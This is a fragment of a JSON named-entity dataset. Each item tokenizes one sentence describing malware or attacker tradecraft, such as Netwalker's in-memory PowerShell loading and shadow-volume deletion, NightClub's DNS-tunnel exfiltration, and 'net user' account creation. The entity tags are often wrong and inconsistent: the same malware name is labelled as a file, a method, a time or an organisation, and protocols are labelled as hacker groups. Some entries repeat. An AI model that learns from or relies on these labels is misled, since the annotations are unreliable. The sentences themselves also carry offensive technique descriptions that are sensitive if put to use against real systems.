"keystrokes", - "on", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "writes", - "multiple", - "outputs", - "to", - "a", - "TMP", - "file", - "using", - "the", - ">>", - "method." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "uses", - "the", - "email", - "platform,", - "Naver,", - "for", - "C2", - "communications,", - "leveraging", - "SMTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "NavRAT", - "uses", - "<code>tasklist", - "/v</code>", - "to", - "check", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "copies", - "itself", - "into", - "a", - "running", - "Internet", - "Explorer", - "process", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "creates", - "a", - "Registry", - "key", - "to", - "ensure", - "a", - "file", - "gets", - "executed", - "upon", - "reboot", - "in", - "order", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "uses", - "<code>systeminfo</code>", - "on", - "a", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NavRAT", - "leverages", - "cmd.exe", - "to", - "perform", - "discovery", - "techniques.", - "NavRAT", - "loads", - "malicious", - "shellcode", - "and", - "executes", - "it", - "in", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "use", - "DLL", - "side-loading", - "to", - "gain", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "has", - "the", - "capability", - "to", - "upload", - "collected", - "files", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "has", - "the", - "ability", - "to", - "delete", - "files", - "and", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "list", - "files", - "and", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "download", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "has", - "created", - "a", - "service", - "named", - "\"Windows", - "Update", - "Agent1\"", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "uses", - "functions", - "named", - "<code>StartUserModeBrowserInjection</code>", - "and", - "<code>StopUserModeBrowserInjection</code>", - "indicating", - "that", - "it's", - "trying", - "to", - "imitate", - "chrome_frame_helper.dll." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Nebulae", - "has", - "the", - "ability", - "to", - "use", - "<code>CreateProcess</code>", - "to", - "execute", - "a", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "use", - "TCP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "enumerate", - "processes", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "achieve", - "persistence", - "through", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "use", - "RC4", - "and", - "XOR", - "to", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "discover", - "logical", - "drive", - "information", - "including", - "the", - "drive", - "type,", - "free", - "space,", - "and", - "volume", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "use", - "CMD", - "to", - "execute", - "a", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nebulae", - "can", - "create", - "a", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "use", - "the", - "Internet", - "Explorer", - "(IE)", - "COM", - "interface", - "to", - "connect", - "and", - "receive", - "commands", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "upload", - "files", - "from", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "clear", - "the", - "browser", - "history", - "on", - "a", - "compromised", - "host", - "by", - "changing", - "the", - "`ClearBrowsingHistoryOnExit`", - "value", - "to", - "1", - "in", - "the", - "`HKEY_CURRENT_USER\\Software\\Microsoft\\Internet", - "Explorer\\Privacy`", - "Registry", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "download", - "additional", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "check", - "for", - "Internet", - "connectivity", - "by", - "contacting", - "bing[.]com", - "with", - "the", - "request", - "format", - "`bing[.]com?id=<GetTickCount>`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "has", - "the", - "ability", - "to", - "configure", - "browser", - "settings", - "by", - "modifying", - "Registry", - "entries", - "under", - "`HKEY_CURRENT_USER\\Software\\Microsoft\\Internet", - "Explorer`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "collect", - "the", - "OS", - "version", - "and", - "computer", - "name", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "identify", - "the", - "system", - "language", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "gather", - "the", - "IP", - "address", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "collect", - "the", - "user", - "name", - "from", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Neoichor", - "can", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nerex", - "drops", - "a", - "signed", - "Microsoft", - "DLL", - "to", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nerex", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "download", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nerex", - "creates", - "a", - "Registry", - "subkey", - "that", - "registers", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nerex", - "creates", - "a", - "Registry", - "subkey", - "that", - "registers", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Net", - "commands", - "used", - "with", - "the", - "<code>/domain</code>", - "flag", - "can", - "be", - "used", - "to", - "gather", - "information", - "about", - "and", - "manipulate", - "user", - "accounts", - "on", - "the", - "current", - "domain." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "user", - "username", - "\\password", - "\\domain</code>", - "commands", - "in", - "Net", - "can", - "be", - "used", - "to", - "create", - "a", - "domain", - "account." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Commands", - "such", - "as", - "<code>net", - "group", - "/domain</code>", - "can", - "be", - "used", - "in", - "Net", - "to", - "gather", - "information", - "about", - "and", - "manipulate", - "groups." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Commands", - "under", - "<code>net", - "user</code>", - "can", - "be", - "used", - "in", - "Net", - "to", - "gather", - "information", - "about", - "and", - "manipulate", - "user", - "accounts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "user", - "username", - "\\password</code>", - "commands", - "in", - "Net", - "can", - "be", - "used", - "to", - "create", - "a", - "local", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Commands", - "such", - "as", - "<code>net", - "group</code>", - "and", - "<code>net", - "localgroup</code>", - "can", - "be", - "used", - "in", - "Net", - "to", - "gather", - "information", - "about", - "and", - "manipulate", - "groups." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "use", - "\\\\system\\share", - "/delete</code>", - "command", - "can", - "be", - "used", - "in", - "Net", - "to", - "remove", - "an", - "established", - "connection", - "to", - "a", - "network", - "share." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "view", - "\\\\remotesystem</code>", - "and", - "<code>net", - "share</code>", - "commands", - "in", - "Net", - "can", - "be", - "used", - "to", - "find", - "shared", - "drives", - "and", - "directories", - "on", - "remote", - "and", - "local", - "systems", - "respectively." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "accounts</code>", - "and", - "<code>net", - "accounts", - "/domain</code>", - "commands", - "with", - "Net", - "can", - "be", - "used", - "to", - "obtain", - "password", - "policy", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Commands", - "such", - "as", - "<code>net", - "view</code>", - "can", - "be", - "used", - "in", - "Net", - "to", - "gather", - "information", - "about", - "available", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lateral", - "movement", - "can", - "be", - "done", - "with", - "Net", - "through", - "<code>net", - "use</code>", - "commands", - "to", - "connect", - "to", - "the", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "start</code>", - "and", - "<code>net", - "stop</code>", - "commands", - "can", - "be", - "used", - "in", - "Net", - "to", - "execute", - "or", - "stop", - "Windows", - "services." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Commands", - "such", - "as", - "<code>net", - "use</code>", - "and", - "<code>net", - "session</code>", - "can", - "be", - "used", - "in", - "Net", - "to", - "gather", - "information", - "about", - "network", - "connections", - "from", - "a", - "particular", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "start</code>", - "command", - "can", - "be", - "used", - "in", - "Net", - "to", - "find", - "information", - "about", - "Windows", - "services." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "<code>net", - "time</code>", - "command", - "can", - "be", - "used", - "in", - "Net", - "to", - "determine", - "the", - "local", - "or", - "remote", - "system", - "time." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Net", - "Crawler", - "uses", - "credential", - "dumpers", - "such", - "as", - "Mimikatz", - "and", - "Windows", - "Credential", - "Editor", - "to", - "extract", - "cached", - "credentials", - "from", - "Windows", - "systems." - ], - "ner_tags": [ - "B-Tool", - "B-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Net", - "Crawler", - "uses", - "a", - "list", - "of", - "known", - "credentials", - "gathered", - "through", - "credential", - "dumping", - "to", - "guess", - "passwords", - "to", - "accounts", - "as", - "it", - "spreads", - "throughout", - "a", - "network." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Net", - "Crawler", - "uses", - "Windows", - "admin", - "shares", - "to", - "establish", - "authenticated", - "sessions", - "to", - "remote", - "systems", - "over", - "SMB", - "as", - "part", - "of", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Net", - "Crawler", - "uses", - "PsExec", - "to", - "perform", - "remote", - "service", - "manipulation", - "to", - "execute", - "a", - "copy", - "of", - "itself", - "as", - "part", - "of", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Tool", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NetTraveler", - "reports", - "window", - "names", - "along", - "with", - "keylogger", - "information", - "to", - "provide", - "application", - "context." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NetTraveler", - "contains", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Netwalker's", - "PowerShell", - "script", - "has", - "been", - "obfuscated", - "with", - "multiple", - "layers", - "including", - "base64", - "and", - "hexadecimal", - "encoding", - "and", - "XOR-encryption,", - "as", - "well", - "as", - "obfuscated", - "PowerShell", - "functions", - "and", - "variables." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "encrypt", - "files", - "on", - "infected", - "machines", - "to", - "extort", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker's", - "PowerShell", - "script", - "can", - "decode", - "and", - "decrypt", - "multiple", - "layers", - "of", - "obfuscation,", - "leading", - "to", - "the", - "Netwalker", - "DLL", - "being", - "loaded", - "into", - "memory." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "detect", - "and", - "terminate", - "active", - "security", - "software-related", - "processes", - "on", - "infected", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Netwalker", - "DLL", - "has", - "been", - "injected", - "reflectively", - "into", - "the", - "memory", - "of", - "a", - "legitimate", - "running", - "process." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker's", - "DLL", - "has", - "been", - "embedded", - "within", - "the", - "PowerShell", - "script", - "in", - "hex", - "format." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Operators", - "deploying", - "Netwalker", - "have", - "used", - "psexec", - "and", - "certutil", - "to", - "retrieve", - "the", - "Netwalker", - "payload." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "delete", - "the", - "infected", - "system's", - "Shadow", - "Volumes", - "to", - "prevent", - "recovery." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Operators", - "deploying", - "Netwalker", - "have", - "used", - "psexec", - "to", - "copy", - "the", - "Netwalker", - "payload", - "across", - "accessible", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "add", - "the", - "following", - "registry", - "entry:", - "<code>HKEY_CURRENT_USER\\SOFTWARE\\{8", - "random", - "characters}</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "use", - "Windows", - "API", - "functions", - "to", - "inject", - "the", - "ransomware", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "has", - "been", - "written", - "in", - "PowerShell", - "and", - "executed", - "directly", - "in", - "memory,", - "avoiding", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "detect", - "and", - "terminate", - "active", - "security", - "software-related", - "processes", - "on", - "infected", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Operators", - "deploying", - "Netwalker", - "have", - "used", - "psexec", - "and", - "certutil", - "to", - "retrieve", - "the", - "Netwalker", - "payload." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "terminate", - "system", - "processes", - "and", - "services,", - "some", - "of", - "which", - "relate", - "to", - "backup", - "software." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "determine", - "the", - "system", - "architecture", - "it", - "is", - "running", - "on", - "to", - "choose", - "which", - "version", - "of", - "the", - "DLL", - "to", - "use." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Operators", - "deploying", - "Netwalker", - "have", - "used", - "batch", - "scripts", - "to", - "retrieve", - "the", - "Netwalker", - "payload." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Netwalker", - "can", - "use", - "WMI", - "to", - "delete", - "Shadow", - "Volumes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nidiran", - "can", - "download", - "and", - "execute", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Nidiran", - "can", - "create", - "a", - "new", - "service", - "named", - "msamger", - "(Microsoft", - "Security", - "Accounts", - "Manager),", - "which", - "mimics", - "the", - "legitimate", - "Microsoft", - "database", - "by", - "the", - "same", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Nidiran", - "can", - "create", - "a", - "new", - "service", - "named", - "msamger", - "(Microsoft", - "Security", - "Accounts", - "Manager)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "`GetForegroundWindow`", - "to", - "enumerate", - "the", - "active", - "window." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "load", - "a", - "module", - "to", - "leverage", - "the", - "LAME", - "encoder", - "and", - "`mciSendStringW`", - "to", - "control", - "and", - "capture", - "audio." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "a", - "DNS", - "tunneling", - "plugin", - "to", - "exfiltrate", - "data", - "by", - "adding", - "it", - "to", - "the", - "subdomain", - "portion", - "of", - "a", - "DNS", - "request." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-SamFile", - "B-Purp", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "a", - "file", - "monitor", - "to", - "steal", - "specific", - "files", - "from", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "SMTP", - "and", - "DNS", - "for", - "file", - "exfiltration", - "and", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "a", - "file", - "monitor", - "to", - "identify", - ".lnk,", - ".doc,", - ".docx,", - ".xls,", - ".xslx,", - "and", - ".pdf", - "files." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "load", - "multiple", - "additional", - "plugins", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "a", - "plugin", - "for", - "keylogging." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "copied", - "captured", - "files", - "and", - "keystrokes", - "to", - "the", - "`%TEMP%`", - "directory", - "of", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "can", - "use", - "emails", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "created", - "a", - "service", - "named", - "`WmdmPmSp`", - "to", - "spoof", - "a", - "Windows", - "Media", - "service." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "NightClub", - "has", - "chosen", - "file", - "names", - "to", - "appear", - "legitimate", - "including", - "EsetUpdate-0117583943.exe", - "for", - "its", - "dropper." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way" - ] - }, - { 